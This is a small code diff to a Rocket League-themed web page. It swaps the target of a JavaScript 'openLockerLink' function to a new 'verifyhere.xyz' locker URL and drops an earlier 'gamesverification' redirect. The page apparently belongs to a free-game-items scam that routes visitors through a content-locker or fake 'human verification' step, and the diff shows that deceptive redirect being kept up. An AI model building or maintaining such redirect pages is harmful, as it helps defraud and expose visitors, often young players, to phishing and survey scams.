--- a/10rocketleague/index.html
+++ b/10rocketleague/index.html
@@ -971,9 +971,7 @@
         });
       function openLockerLink() {
         // window.location = "https://youtube.com/";
-        // window.location.href = "https://verifyuser.org/cl/i/6dxw9m";
-        window.location.href =
-          "https://glitchandgrind.wixsite.com/gamesverification";
+        window.location.href = "https://verifyhere.xyz/cl/i/6dxw9m";
       }
     </script>
   </body>
